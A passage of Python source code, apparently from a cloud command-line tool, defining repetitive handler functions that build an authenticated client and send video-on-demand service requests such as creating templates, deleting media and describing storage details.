g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateContentReviewTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.CreateContentReviewTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateSampleSnapshotTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateSampleSnapshotTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.CreateSampleSnapshotTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteAIAnalysisTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteAIAnalysisTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.DeleteAIAnalysisTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeMediaInfos(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeMediaInfosRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeMediaInfos(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doLiveRealTimeClip(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.LiveRealTimeClipRequest()
model.from_json_string(json.dumps(args))
rsp = client.LiveRealTimeClip(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doPullUpload(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.PullUploadRequest()
model.from_json_string(json.dumps(args))
rsp = client.PullUpload(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifySampleSnapshotTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifySampleSnapshotTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.ModifySampleSnapshotTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyVodDomainAccelerateConfig(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyVodDomainAccelerateConfigRequest()
model.from_json_string(json.dumps(args))
rsp = client.ModifyVodDomainAccelerateConfig(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteSuperPlayerConfig(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteSuperPlayerConfigRequest()
model.from_json_string(json.dumps(args))
rsp = client.DeleteSuperPlayerConfig(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeProcedureTemplates(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeProcedureTemplatesRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeProcedureTemplates(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeTranscodeTemplates(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeTranscodeTemplatesRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeTranscodeTemplates(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doParseStreamingManifest(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ParseStreamingManifestRequest()
model.from_json_string(json.dumps(args))
rsp = client.ParseStreamingManifest(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateProcedureTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateProcedureTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.CreateProcedureTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doPushUrlCache(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.PushUrlCacheRequest()
model.from_json_string(json.dumps(args))
rsp = client.PushUrlCache(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteMedia(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteMediaRequest()
model.from_json_string(json.dumps(args))
rsp = client.DeleteMedia(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateSuperPlayerConfig(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateSuperPlayerConfigRequest()
model.from_json_string(json.dumps(args))
rsp = client.CreateSuperPlayerConfig(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyPersonSample(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyPersonSampleRequest()
model.from_json_string(json.dumps(args))
rsp = client.ModifyPersonSample(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteContentReviewTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteContentReviewTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.DeleteContentReviewTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateAIAnalysisTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateAIAnalysisTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.CreateAIAnalysisTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyVodDomainConfig(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyVodDomainConfigRequest()
model.from_json_string(json.dumps(args))
rsp = client.ModifyVodDomainConfig(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeSnapshotByTimeOffsetTemplates(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeSnapshotByTimeOffsetTemplatesRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeSnapshotByTimeOffsetTemplates(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doProcessMediaByUrl(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ProcessMediaByUrlRequest()
model.from_json_string(json.dumps(args))
rsp = client.ProcessMediaByUrl(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyTranscodeTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyTranscodeTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.ModifyTranscodeTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeContentReviewTemplates(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeContentReviewTemplatesRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeContentReviewTemplates(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyWatermarkTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyWatermarkTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.ModifyWatermarkTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeStorageDetails(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeStorageDetailsRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeStorageDetails(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteWordSamples(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteWordSamplesRequest()
model.from_json_string(json.dumps(args))
rsp = client.DeleteWordSamples(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateVodDomain(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateVodDomainRequest()
model.from_json_string(json.dumps(args))
rsp = client.CreateVodDomain(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateImageSpriteTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
